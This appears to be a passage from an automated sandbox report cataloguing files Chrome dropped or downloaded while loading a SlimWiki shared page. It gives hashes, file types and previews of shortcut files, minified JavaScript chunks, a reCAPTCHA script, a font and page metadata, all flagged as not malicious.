                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2691
                                                      Entropy (8bit):3.9964952015380644
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9C62653E5465A0E6AB2716AE921B73BC
                                                      SHA1:348A2DE86BF1C9033DE0F586449B41C488AB012A
                                                      SHA-256:3726C542DE23B4A97855DFFDB73D2ACE1806AAAD37888BDEF31846212C0C7518
                                                      SHA-512:2A66981BCD849DBA70E120786D27DBA0BD93DA1AD4769EC22A09A13512848FAB776510DE757EEF80EFD4FDBE6C861E3171BB83629FE85B4D45F2C7C7E60646F3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 13:35:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.987298067488207
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C460AE9B3838E6721A14993ADBC18BF7
                                                      SHA1:20955A65836B1435B3F5233780764EA51274CE35
                                                      SHA-256:F74D240CA02429405E55A69A053571CD171326AC7017F5A9F23B472683B4FD0A
                                                      SHA-512:F84B44B372169795642F35918124FE57FC1005E0C11F42213DE0A80E68AEE91920B8977EA8BD647E83082A63DEE9C6C14A6285B64CAC136422722D8C6C681BE9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xft.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 13:35:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.975907311507314
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:99EEE47B25401965A16636347A324C10
                                                      SHA1:A5F21EB236D43B25B80332D8FC3E82CD3BF3F3DF
                                                      SHA-256:3C7CA842DFA3519D8FC61B218FEF1C290748F9388B95095E92CDF2C455C7FB85
                                                      SHA-512:55719E799F22AF2FE76C8C380DA4D5F827CABF9E2BE56EE2A4DB7BCB7A50051B7AEFBFD543CC0E98428C2CF3B2428E24D3E437DA18D422E36190C1F019D93F33
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xft.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 13:35:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.9875752517022547
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F99CF2B304A74DDEEFA90BDBC2BBD7AF
                                                      SHA1:FD755C4C43177B3DB67BCA43315E5C3278ED5F8A
                                                      SHA-256:513E1D129D5A47434F123590664939D7643B6BCC0405F676EA18152F1FD3378E
                                                      SHA-512:B7D51705811D8BA1A0E25CBF4CDABA1C7AD6F29D696A6E2A784D00E2C45353846AC306DAF0601901A8D4D34D7FFC0E9483DAEAB993D34226F5331941CAEBF684
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,....)...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xft.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7803), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):7803
                                                      Entropy (8bit):5.2614651743969425
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D74D99871BD41088249B17224355D18F
                                                      SHA1:009C8AABE4ACDD1FDB8D9E4DC31F06F154595657
                                                      SHA-256:EAFB1C496EB70372F6C25557249417CD54EA431067A5CC253A5B3F046A709068
                                                      SHA-512:42BD8F8333320A092410B99616D832E81ABDCB8AB1447BDA7212C0D0BDAA3FBC24E5D28BFC6EE648F4C63A711EEECB9FE72E127DB2D75EE6338B59A5E3BB704A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/8152-cd8f1b60971f40a2.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8152],{38152:function(e,t,n){n.d(t,{Eh:function(){return V},NM:function(){return P},VY:function(){return S},aJ:function(){return M},fC:function(){return F},xz:function(){return N},zt:function(){return Y}});var r=n(14749),o=n(2265),l=n(44991),i=n(61266),a=n(84104),u=n(1260),c=n(38687),s=n(96665),p=n(37881),d=n(12642),f=n(29586),h=n(59143),g=n(9310),y=n(11780);let[v,m]=(0,a.b)("Tooltip",[s.D7]),b=(0,s.D7)(),x="tooltip.open",[E,w]=v("TooltipProvider"),C="Tooltip",[T,_]=v(C),k="TooltipTrigger",M=(0,o.forwardRef)((e,t)=>{let{__scopeTooltip:n,...a}=e,u=_(k,n),c=w(k,n),p=b(n),d=(0,o.useRef)(null),h=(0,i.e)(t,d,u.onTriggerChange),g=(0,o.useRef)(!1),y=(0,o.useRef)(!1),v=(0,o.useCallback)(()=>g.current=!1,[]);return(0,o.useEffect)(()=>()=>document.removeEventListener("pointerup",v),[v]),(0,o.createElement)(s.ee,(0,r.Z)({asChild:!0},p),(0,o.createElement)(f.WV.button,(0,r.Z)({"aria-describedby":u.open?u.contentId:void 0,"data-s
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):117194
                                                      Entropy (8bit):5.341081616152214
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:DB6225E39FFC3393A75811B5A51B34F2
                                                      SHA1:F5A413FA2EA04BE9782D905C16296CD5FE546396
                                                      SHA-256:D824D3469DA988001147BFF087C8725F741667E9364C633948D8F5E5DC6A24FD
                                                      SHA-512:FB5A652AB5DB9BDF9A75829AE90C573AE725E63C46EAE46A9C4A809874D02716AED3E3B92C720205C5AC16EA8E620C9058305B656A54228AF397E8411BCC1526
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/396464d2-9b965fa67edba9ac.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9119],{1333:function(e,t,r){let n,s,i,o,a,l;r.d(t,{Gs:function(){return rw}});var c,u,d,h,p,m,f,y,g=r(45011),_=r(13523),S=r(53334),v=r(93154),w=r(59701),b=r(2244),E=r(3705),k=r(54967),I=r(15729),M=r(43556),C=r(21477),R=r(63677),T=r(46744),x=r(61070),A=r(95836),D=r(67168),O=r(20996),N=r(94705),L=r(67008),P=r(36631),F=r(36078),B=r(48630),U=r(58105),z=r(86502),W=r(73672);let j=M.GLOBAL_OBJ,H="sentryReplaySession",$="Unable to send Replay";function q(e){let t;let r=e[0],n=1;for(;n<e.length;){let s=e[n],i=e[n+1];if(n+=2,("optionalAccess"===s||"optionalCall"===s)&&null==r)return;"access"===s||"optionalAccess"===s?(t=r,r=i(r)):("call"===s||"optionalCall"===s)&&(r=i((...e)=>r.call(t,...e)),t=void 0)}return r}function K(e){let t=q([e,"optionalAccess",e=>e.host]);return q([t,"optionalAccess",e=>e.shadowRoot])===e}function V(e){return"[object ShadowRoot]"===Object.prototype.toString.call(e)}function J(e){try{var t;let r=e.rules
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (9562)
                                                      Category:downloaded
                                                      Size (bytes):10924
                                                      Entropy (8bit):5.232104168462341
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C0020F54C221DB46479CB3464C51D4B5
                                                      SHA1:8E813254D642741625FED1C162FE43BD915E2012
                                                      SHA-256:1FFAB467FC50D9CDDB42032134288AB49077A55931DE6980F9EEE3A32E4D24DF
                                                      SHA-512:471E1AF67BE99B78AD26A70309B0FBD78AC1E3B34D197EF49C373A616C6D33DF7D308BD47F0993D8691A4B36BFBDE407EC9944667612145847BB039DBDDA938A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/8980-af23a222a36ac79a.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8980],{30699:function(e,t,r){/**. * @license React. * use-sync-external-store-shim.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var n=r(2265),i="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},o=n.useState,u=n.useEffect,a=n.useLayoutEffect,c=n.useDebugValue;function s(e){var t=e.getSnapshot;e=e.value;try{var r=t();return!i(e,r)}catch(e){return!0}}var l="undefined"==typeof window||void 0===window.document||void 0===window.document.createElement?function(e,t){return t()}:function(e,t){var r=t(),n=o({inst:{value:r,getSnapshot:t}}),i=n[0].inst,l=n[1];return a(function(){i.value=r,i.getSnapshot=t,s(i)&&l({inst:i})},[e,r,t]),u(function(){return s(i)&&l({inst:i}),e(function(){s(i)&&l({inst:i})})},[e]),c(r),r};t.useSync
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10358), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):10358
                                                      Entropy (8bit):5.269243431694964
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B97B1B033B172EB314D0400FE6EE87CA
                                                      SHA1:E778DCD5FD7BF3CDA8D13CBA684E512CA4A05AAC
                                                      SHA-256:1AAC736C811591A8A49EBDBD0B77B5739BB5B853E9DAF4D65624FF92FAE3AFB8
                                                      SHA-512:44A68EB84E449F465410B0A4343999AA9C7E7C9DC1EF56A2AA82ED4A49E38788515D6BC719AFB151DB0DD890B0C0E70797B6E8CA4C4245413B1D0218E08E94F9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/4819-9cd1e7ce5ee6d46f.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4819],{1293:function(e,t,n){n.d(t,{Y:function(){return p}});var r=n(27367),a=n(11176),o=n(80985),s=n(97832),i=n(89539),c=n.n(i),u=n(70331),l=n.n(u),d=n(5251);class h{async setAuthTokenCookie(e){let t=c()().add(7,"day").toDate();await s.f.set(o.HI,e,{expires:t})}normalizeAuthResponse(e){return Object.keys(e).reduce((t,n)=>({...t,[n]:l()(e[n])?void 0:e[n]}),{})}async fetchMe(){return await (0,a.fk)().get("/api/v1/users/me")}async fetchMeByAccountWiki(e,t){if(e&&t)return await (0,a.fk)().get("/api/v1/users/me?accountId=".concat(e,"&wikiId=").concat(t))}async fetchMeByAccount(e){return(0,a.fk)().get("/api/v1/users/me",{params:{accountId:e}})}async signIn(e){let t=await (0,a.fk)().post("/api/v1/auth/login",e);return await this.setAuthTokenCookie(t.auth.token),this.normalizeAuthResponse(t)}async signUp(e){let t=await (0,a.fk)().post("/api/v1/auth/sign-up",e);return await this.setAuthTokenCookie(t.auth.token),this.normalize
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):104
                                                      Entropy (8bit):4.840199122155243
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:021197253B2562210B461059E9AD2DF3
                                                      SHA1:179ECE63910591822F738E8E999028C969C4A832
                                                      SHA-256:29B65BE90398DCE2A43CFB41EF2A4B0E08FACAE58215B1A03DD454D590B16EC9
                                                      SHA-512:512E85D9FB36BE2C9189A3B575A57CECB73FB3B33839CCBF8D56064872C8CD93BBFE9B371A696AEA3E0C325A64DCBEEA2974BFB751576376D158012F9982CA9C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmOeBX2xkXHNBIFDV9X_g0SBQ0TmyRjEjMJyI2m6zGdubkSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43Q=?alt=proto
                                                      Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKNgoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (20001)
                                                      Category:downloaded
                                                      Size (bytes):21779
                                                      Entropy (8bit):5.397302396786675
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3D191D9BB4AA6436A8213D10668A8564
                                                      SHA1:55C9DA7D69D6A58409499B342E39B47A8CCB3592
                                                      SHA-256:4E2DF6D1205925B0C64719F6EF02AE0F7180F9E7067E38586AEF33BFE861D6A1
                                                      SHA-512:B3C4D5214D011C1ECFCEAB51B200128502ABE91DC6BEFB7FD7C7B7052249978EEA1AC5F91CD721A98EAB8AF04D83EF6A95A9D93B90416844C752FB70F01DB8C1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/%5Blocale%5D/not-found-a412d9c3bfeb85d4.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6082],{54134:function(e,t,n){Promise.resolve().then(n.bind(n,24252))},57977:function(e,t,n){"use strict";n.d(t,{Z:function(){return u}});var r=n(2265);/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */let l=e=>e.replace(/([a-z0-9])([A-Z])/g,"$1-$2").toLowerCase(),i=(...e)=>e.filter((e,t,n)=>!!e&&n.indexOf(e)===t).join(" ");/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */var a={xmlns:"http://www.w3.org/2000/svg",width:24,height:24,viewBox:"0 0 24 24",fill:"none",stroke:"currentColor",strokeWidth:2,strokeLinecap:"round",strokeLinejoin:"round"};/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory o
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                      Category:downloaded
                                                      Size (bytes):28000
                                                      Entropy (8bit):7.99335735457429
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                      SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                      SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                      SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/pqlCppCS9zI12Ua1duv40
                                                      Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (40063)
                                                      Category:downloaded
                                                      Size (bytes):54896
                                                      Entropy (8bit):5.138978309674951
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2C0A88395165B692D25802807D73E8A4
                                                      SHA1:E00537B0AAE1509E92C15F74F465FD66745A0FA1
                                                      SHA-256:42EAC1F92169806B6A865769DABB6C8AEF9FF16C6D0D39F986775934FA5037B7
                                                      SHA-512:102CDECE02F19AEA806E5985ADF1D906181E57702D2ED242C696F3CC983CAE19293AF44296933DEE333262478025A5A354C25D649C26899282879A7799291579
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/54a60aa6-6fbc2d6840b62ef3.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7902],{40318:function(e,t,n){n.d(t,{Cf:function(){return eC},DK:function(){return ej},EG:function(){return eg},Jo:function(){return er},K9:function(){return e$},ML:function(){return eO},NB:function(){return eB},Nl:function(){return f},P1:function(){return y},QC:function(){return eu},S0:function(){return eN},XP:function(){return eo},ar:function(){return ed},b5:function(){return ei},eE:function(){return Q},hj:function(){return D},nU:function(){return w},pr:function(){return ey},qv:function(){return es},tI:function(){return ep},u9:function(){return ec},vc:function(){return eP},x2:function(){return eT},xh:function(){return W},zK:function(){return eA}});var r=n(19672),o=n(3654),i=n(54933),s=n(49975),a=n(49430),l=n(98615),d=n(54736);function c(e){let{state:t,transaction:n}=e,{selection:r}=n,{doc:o}=n,{storedMarks:i}=n;return{...t,apply:t.apply.bind(t),applyTransaction:t.applyTransaction.bind(t),filterTransaction:t.filterTr
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):11056
                                                      Entropy (8bit):4.066558945974236
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:929CC29FA6881FCCCB70CC016D2E2BE8
                                                      SHA1:AB4559D6D006A2A73EEE4BB3DB48E7569AF9D791
                                                      SHA-256:E89C0482868D7EEBD66C68C7545A0D9E1A817CC5C81AB948663FCE55318C43A1
                                                      SHA-512:CB17BD9DDE9B3FF329CC1557F2AA83C428B60C0954046B3FBBA6A57D40CF74A5A43E6BB2C7B284297AC3418AA314CED58856F4E96CD560909D07785CA49883BF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:{"id":"b2e3e9e4-cd15-495a-a789-9f597ef87db7","token":"4c231ba1-3080-47e5-bea1-ba3ed25fb9a4","createdAt":"2024-07-01T14:15:21.008Z","updatedAt":"2024-07-01T14:15:21.008Z","pageId":"59fc40d5-0d00-49b2-ae73-e21dcb13cb8f","sharedPage":{"id":"59fc40d5-0d00-49b2-ae73-e21dcb13cb8f","title":"Accurate Safety Compliance","titleBinary":{"type":"Buffer","data":[4,3,156,241,213,253,13,0,7,1,7,100,101,102,97,117,108,116,3,9,112,97,114,97,103,114,97,112,104,7,0,156,241,213,253,13,0,6,1,0,156,241,213,253,13,1,7,1,134,255,133,206,7,0,33,1,5,116,105,116,108,101,7,100,101,102,97,117,108,116,3,3,188,130,227,129,7,0,33,1,5,116,105,116,108,101,7,100,101,102,97,117,108,116,1,40,1,6,99,111,110,102,105,103,20,105,110,105,116,105,97,108,67,111,110,116,101,110,116,76,111,97,100,101,100,1,120,161,188,130,227,129,7,0,1,4,230,223,251,227,1,0,33,1,5,116,105,116,108,101,7,100,101,102,97,117,108,116,2,161,134,255,133,206,7,2,1,132,156,241,213,253,13,8,26,65,99,99,117,114,97,116,101,32,83,97,102,101,116,121,32,67,111,1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (13338)
                                                      Category:downloaded
                                                      Size (bytes):13546
                                                      Entropy (8bit):5.275705522436238
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:265F57AE8183DB094A7E62534205E577
                                                      SHA1:808CD53515C6F2B81C635E8320698710731DADD4
                                                      SHA-256:F629AA4672A50FD2DAC86026D4556CE540A06A9EDA4E15E64DE6F62F95033489
                                                      SHA-512:9D76499B1D09CFED39A25E3608109574FF2DD8F6F36D5A1ED86E4476166A8D1C14C073EAC62B0E4BC9F874D86539CB8013F88F616DB2762DB69F9DB7042B5819
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/4237-52cc10650325a677.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4237],{16480:function(e,r){var t;/*!..Copyright (c) 2018 Jed Watson...Licensed under the MIT License (MIT), see..http://jedwatson.github.io/classnames.*/!function(){"use strict";var n={}.hasOwnProperty;function o(){for(var e="",r=0;r<arguments.length;r++){var t=arguments[r];t&&(e=l(e,function(e){if("string"==typeof e||"number"==typeof e)return e;if("object"!=typeof e)return"";if(Array.isArray(e))return o.apply(null,e);if(e.toString!==Object.prototype.toString&&!e.toString.toString().includes("[native code]"))return e.toString();var r="";for(var t in e)n.call(e,t)&&e[t]&&(r=l(r,t));return r}(t)))}return e}function l(e,r){return r?e?e+" "+r:e+r:e}e.exports?(o.default=o,e.exports=o):void 0!==(t=(function(){return o}).apply(r,[]))&&(e.exports=t)}()},22219:function(e,r,t){"use strict";function n(e,[r,t]){return Math.min(t,Math.max(r,e))}t.d(r,{u:function(){return n}})},12275:function(e,r,t){"use strict";t.d(r,{gm:function(){return l}}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (636)
                                                      Category:downloaded
                                                      Size (bytes):546598
                                                      Entropy (8bit):5.708515975651759
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:93E3F7248853EA26232278A54613F93C
                                                      SHA1:16100C397972A415BFCFCE1A470ACAD68C173375
                                                      SHA-256:0EC782544506A0AEA967EA044659C633E1EE735B79E5172CB263797CC5CEFE3A
                                                      SHA-512:26ACA30DE753823A247916A9418AA8BCE24059D80EC35AF6E1A08A6E931DCF3119E326EC7239A1F8F83439979F39460B1F74C1A6D448E2F0702E91F5AD081DF9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (38054)
                                                      Category:downloaded
                                                      Size (bytes):185505
                                                      Entropy (8bit):5.44610568852003
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:20BB6F9E8B7167F6D75D5888D22ACFAB
                                                      SHA1:A9DC0448604014EEC5125FBC71BE0E7FDAAF59F5
                                                      SHA-256:09050854DA88167CE6A8003C67D3DA155E4568B26E39F39BF332F27B07FF91A9
                                                      SHA-512:FE831FA14038F04F93AE31DA6509AB6C4795291D15DD8CA0C9D7FB8660F6C81F467582B197A71D48B16934269BE2E5BDA33E9EF2BBCC16B2575893B080777C34
                                                      Malicious:false
                                                      Reputation:unknown
